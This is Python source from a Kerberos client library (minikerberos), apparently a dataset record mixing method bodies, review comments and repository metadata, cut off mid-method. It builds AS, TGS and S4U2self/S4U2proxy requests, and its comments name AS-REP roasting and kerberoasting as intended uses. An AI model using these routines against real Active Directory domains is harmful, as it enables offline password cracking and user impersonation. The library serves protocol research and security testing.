    kdc_req_body['etype'] = [supp_enc.value] #selecting according to server's preferences

    kdc_req = {}
    kdc_req['pvno'] = krb5_pvno
    kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
    kdc_req['padata'] = [pa_data_2,pa_data_1]
    kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)

    req = AS_REQ(kdc_req)
    logger.debug('Sending TGT request to server')
    return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
    """
    Fetch a TGT for self.usercreds from the KDC.

    override_etype: optional list of etype values (int) to advertise
        instead of the credential's supported etypes
    decrypt_tgt: used for asreproast attacks; when False the AS-REP is
        stored undecrypted and the method returns early
    Steps performed:
        1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
        2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
        3. PROFIT
    """
    logger.debug('Generating initial TGT without authentication data')
    now = datetime.datetime.utcnow()
    kdc_req_body = {}
    kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
    kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
    kdc_req_body['realm'] = self.usercreds.domain.upper()
    # TGT requests always target the krbtgt service of the user's realm.
    kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
    kdc_req_body['till'] = now + datetime.timedelta(days=1)
    kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
    kdc_req_body['nonce'] = secrets.randbits(31)
    if override_etype is None:
        kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
    else:
        kdc_req_body['etype'] = override_etype

    pa_data_1 = {}
    pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
    pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()

    kdc_req = {}
    kdc_req['pvno'] = krb5_pvno
    kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
    kdc_req['padata'] = [pa_data_1]
    kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)

    req = AS_REQ(kdc_req)

    logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
    # throw=False: a KRB_ERROR reply is returned, not raised.
    rep = self.ksoc.sendrecv(req.dump(), throw = False)

    if rep.name != 'KRB_ERROR':
        #user can do kerberos auth without preauthentication!
        self.kerberos_TGT = rep.native

        #if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
        #so we just return, the asrep can be extracted from this object anyhow
        if decrypt_tgt == False:
            return

        # Without pre-auth negotiation the RC4 (etype 23) key is assumed.
        self.kerberos_cipher = _enctype_table[23]
        self.kerberos_cipher_type = 23
        self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
    else:
        # Anything other than "pre-auth required" is a hard failure.
        if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
            raise KerberosError(rep)

        rep = rep.native
        logger.debug('Got reply from server, asikg to provide auth data')

        rep = self.do_preauth(rep)
        logger.debug('Got valid TGT response from server')
        rep = rep.native

    # NOTE(review): in the no-preauth branch `rep` is never replaced with
    # `rep.native`, so the tail below handles the raw response object there —
    # verify this path against upstream before relying on it.
    self.kerberos_TGT = rep

    cipherText = rep['enc-part']['cipher']
    # Key usage 3 = AS-REP enc-part encrypted with the client's long-term key.
    temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
    self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
    self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
    self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
    logger.debug('Got valid TGT')

    return
def get_TGS(self, spn_user, override_etype = None):
    """
    Requests a TGS ticket for the specified user.
    Returns the TGS ticket and the decrypted encTGSRepPart.
    spn_user: KerberosTarget: the service user you want to get TGS for.
    override_etype: None or list of etype values (int). Used mostly for
        kerberoasting; overrides the advertised etype values (otherwise
        derived from the TGT) so any TGS ticket encryption can be received.
    """
    #construct tgs_req
    logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
    now = datetime.datetime.utcnow()
    kdc_req_body = {}
    kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
    kdc_req_body['realm'] = spn_user.domain.upper()
    kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
    kdc_req_body['till'] = now + datetime.timedelta(days=1)
    kdc_req_body['nonce'] = secrets.randbits(31)
    if override_etype:
        kdc_req_body['etype'] = override_etype
    else:
        kdc_req_body['etype'] = [self.kerberos_cipher_type]

    # Authenticator proves possession of the TGT session key.
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now

    # Key usage 7 = TGS-REQ PA-TGS-REQ authenticator (RFC 4120 7.5.1).
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_data_1 = {}
    pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
    pa_data_1['padata-value'] = AP_REQ(ap_req).dump()

    kdc_req = {}
    kdc_req['pvno'] = krb5_pvno
    kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    kdc_req['padata'] = [pa_data_1]
    kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)

    req = TGS_REQ(kdc_req)
    logger.debug('Constructing TGS request to server')
    rep = self.ksoc.sendrecv(req.dump())
    logger.debug('Got TGS reply, decrypting...')
    tgs = rep.native

    # Key usage 8 = TGS-REP enc-part encrypted with the TGT session key.
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])

    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid TGS reply')
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    #def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    """
    Perform the S4U2self exchange: obtain a service ticket to our own
    account on behalf of another user (protocol transition, MS-SFU).

    user_to_impersonate : KerberosTarget class
    supp_enc_methods: encryption types offered to the server
    Returns (tgs, encTGSRepPart, key) like get_TGS.
    NOTE(review): mutable default list for supp_enc_methods; safe only
    because it is never mutated.
    """
    if not self.kerberos_TGT:
        logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
        self.get_TGT()

    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    auth_package_name = 'Kerberos'
    now = datetime.datetime.utcnow()

    ###### Calculating authenticator data
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now

    # Key usage 7 = TGS-REQ PA-TGS-REQ authenticator (RFC 4120 7.5.1).
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_data_auth = {}
    pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
    pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()

    ###### Calculating checksum data
    # Checksum input layout per MS-SFU: name-type || username || realm || auth package.
    S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
    S4UByteArray += user_to_impersonate.username.encode()
    S4UByteArray += user_to_impersonate.domain.encode()
    S4UByteArray += auth_package_name.encode()
    logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
    logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
    # HMAC-MD5 with key usage 17 is mandated for the PA-FOR-USER checksum.
    chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
    logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
    chksum = {}
    chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
    chksum['checksum'] = chksum_data

    ###### Filling out PA-FOR-USER data for impersonation
    pa_for_user_enc = {}
    pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
    pa_for_user_enc['userRealm'] = user_to_impersonate.domain
    pa_for_user_enc['cksum'] = Checksum(chksum)
    pa_for_user_enc['auth-package'] = auth_package_name

    pa_for_user = {}
    pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
    pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()

    ###### Constructing body
    krb_tgs_body = {}
    krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
    # sname is our own account: S4U2self requests a ticket to ourselves.
    krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
    krb_tgs_body['realm'] = self.usercreds.domain.upper()
    krb_tgs_body['till'] = now + datetime.timedelta(days=1)
    krb_tgs_body['nonce'] = secrets.randbits(31)
    krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences

    krb_tgs_req = {}
    krb_tgs_req['pvno'] = krb5_pvno
    krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
    krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)

    req = TGS_REQ(krb_tgs_req)
    logger.debug('Sending S4U2self request to server')
    try:
        reply = self.ksoc.sendrecv(req.dump())
    except KerberosError as e:
        # Error 16 typically means delegation is not enabled; re-raised in all cases.
        if e.errorcode.value == 16:
            logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
        raise e

    logger.debug('Got S4U2self reply, decrypting...')
    tgs = reply.native

    # Key usage 8 = TGS-REP enc-part encrypted with the TGT session key.
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])

    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid TGS reply')
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    """Perform the S4U2proxy (constrained delegation) TGS exchange.

    s4uself_ticket: Ticket obtained earlier via S4U2self, sent as the
        additional-tickets evidence.
    spn_user: KerberosTarget describing the target service SPN.
    supp_enc_methods: encryption types offered to the server.

    NOTE(review): on success the KDC reply is neither decrypted nor
    returned — the method falls off the end and returns None, so the
    proxied service ticket is unobtainable by callers. Looks unfinished;
    confirm against upstream before relying on the result.
    NOTE(review): mutable default list for supp_enc_methods; safe only
    because it is never mutated.
    """
    now = datetime.datetime.utcnow()
    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)

    # PA-PAC-OPTIONS with the RBCD bit, required for resource-based
    # constrained delegation (MS-SFU 2.2.5).
    pa_pac_opts = {}
    pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
    pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()

    # Authenticator proves possession of the TGT session key.
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now

    # Key usage 7 = TGS-REQ PA-TGS-REQ authenticator (RFC 4120 7.5.1).
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_tgs_req = {}
    pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
    pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()

    krb_tgs_body = {}
    #krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
    krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
    krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
    krb_tgs_body['realm'] = self.usercreds.domain.upper()
    krb_tgs_body['till'] = now + datetime.timedelta(days=1)
    krb_tgs_body['nonce'] = secrets.randbits(31)
    krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
    # The S4U2self ticket is the delegation evidence.
    krb_tgs_body['additional-tickets'] = [s4uself_ticket]

    krb_tgs_req = {}
    krb_tgs_req['pvno'] = krb5_pvno
    krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
    krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)

    req = TGS_REQ(krb_tgs_req)
    try:
        reply = self.ksoc.sendrecv(req.dump())
    except KerberosError as e:
        # Error 16 typically means delegation is not enabled; re-raised in all cases.
        if e.errorcode.value == 16:
            logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
        raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
    """Build the raw AP_REQ blob for an already-obtained service ticket.

    Encrypts a fresh authenticator (client name/realm/time taken from the
    stored TGT) with *sessionkey*, using the cipher indicated by the TGS
    reply, and wraps it together with the service ticket into an AP_REQ.

    tgs: native (decoded) TGS_REP structure holding the service ticket
    encTGSRepPart: decrypted enc-part of the TGS_REP (selects the cipher)
    sessionkey: Key shared with the target service
    Returns the DER-encoded AP_REQ as bytes.
    """
    now = datetime.datetime.utcnow()

    # Authenticator proves possession of the service session key;
    # ctime/cusec provide replay-detection material.
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now

    # Fix: stray debug print() replaced with the module logger used everywhere else.
    logger.debug('get_something: authenticator etype %s' % encTGSRepPart['key']['keytype'])
    cipher = _enctype_table[encTGSRepPart['key']['keytype']]
    # Key usage 11 = AP-REQ authenticator (RFC 4120 7.5.1).
    authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ticket'] = Ticket(tgs['ticket'])
    ap_req['ap-options'] = APOptions(set([]))
    # NOTE(review): the advertised etype is the TGT's cipher type while the
    # authenticator was encrypted with the TGS-negotiated cipher — looks
    # inconsistent; preserved as-is, confirm against the target service.
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    return AP_REQ(ap_req).dump()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.S4U2self | python | def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | user_to_impersonate : KerberosTarget class | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L351-L453 | [
"def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP\n\t\"\"\"\n\tCreates credential object from the TGS and adds to the ccache file\n\tThe TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT\n\n\... | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
    """Kerberos client protocol state holder.

    ccred: user credential object (key material, supported etypes)
    ksoc: socket wrapper used to talk to the KDC
    ccache: optional user-supplied CCACHE; obtained tickets are also
        collected into a fresh internal CCACHE (self.ccache)
    """
    self.usercreds = ccred
    self.ksoc = ksoc
    self.user_ccache = ccache
    self.ccache = CCACHE()
    # Session state, filled in as the AS/TGS exchanges complete.
    self.kerberos_session_key = None    # Key shared with the KDC (from AS-REP enc-part)
    self.kerberos_TGT = None            # native AS-REP structure
    self.kerberos_TGT_encpart = None    # decrypted enc-part of the AS-REP
    self.kerberos_TGS = None            # last TGS-REP received
    self.kerberos_cipher = None         # cipher object negotiated with the KDC
    self.kerberos_cipher_type = None    # numeric etype of that cipher
    self.kerberos_key = None            # long-term key derived from usercreds
@staticmethod
def from_tgt(ksoc, tgt, key):
    """
    Sets up the kerberos object from tgt and the session key.
    Use this function when pulling the TGT from ccache file.

    ksoc: socket wrapper used to talk to the KDC
    tgt: native TGT (AS-REP) structure
    key: dict with 'keytype' and 'keyvalue' describing the session key
    Returns a KerbrosComm ready to request service tickets.
    """
    # No credentials needed (None): TGT + session key suffice for TGS requests.
    kc = KerbrosComm(None, ksoc)
    kc.kerberos_TGT = tgt
    kc.kerberos_cipher_type = key['keytype']
    kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
    kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
    return kc
def do_preauth(self, rep):
    """Answer a KDC_ERR_PREAUTH_REQUIRED error with an authenticated AS_REQ.

    rep: native KRB_ERROR whose 'e-data' advertises the encryption
        types (and salts) the server accepts.
    Side effects: stores the selected cipher, etype and long-term key
    on self (kerberos_cipher, kerberos_cipher_type, kerberos_key).
    Returns the reply object of the follow-up AS_REQ.
    """
    #now getting server's supported encryption methods
    # OrderedDict keeps the server's advertised preference order.
    supp_enc_methods = collections.OrderedDict()
    for enc_method in METHOD_DATA.load(rep['e-data']).native:
        data_type = PaDataType(enc_method['padata-type'])
        if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
            if data_type == PaDataType.ETYPE_INFO:
                enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
            elif data_type == PaDataType.ETYPE_INFO2:
                enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
            for enc_info in enc_info_list.native:
                # Map etype -> salt (needed for string-to-key derivation).
                supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
                logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))

    logger.debug('Constructing TGT request with auth data')
    #now to create an AS_REQ with encrypted timestamp for authentication
    pa_data_1 = {}
    pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
    pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()

    now = datetime.datetime.utcnow()
    #creating timestamp asn1
    timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()

    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    logger.debug('Selecting common encryption type: %s' % supp_enc.name)
    self.kerberos_cipher = _enctype_table[supp_enc.value]
    self.kerberos_cipher_type = supp_enc.value
    self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
    # Key usage 1 = AS-REQ PA-ENC-TIMESTAMP (RFC 4120 7.5.1).
    enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)

    pa_data_2 = {}
    pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
    pa_data_2['padata-value'] = EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump()

    kdc_req_body = {}
    kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
    kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
    kdc_req_body['realm'] = self.usercreds.domain.upper()
    # TGT requests always target the krbtgt service of the user's realm.
    kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
    kdc_req_body['till'] = now + datetime.timedelta(days=1)
    kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
    kdc_req_body['nonce'] = secrets.randbits(31)
    kdc_req_body['etype'] = [supp_enc.value] #selecting according to server's preferences

    kdc_req = {}
    kdc_req['pvno'] = krb5_pvno
    kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
    kdc_req['padata'] = [pa_data_2,pa_data_1]
    kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)

    req = AS_REQ(kdc_req)
    logger.debug('Sending TGT request to server')
    return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
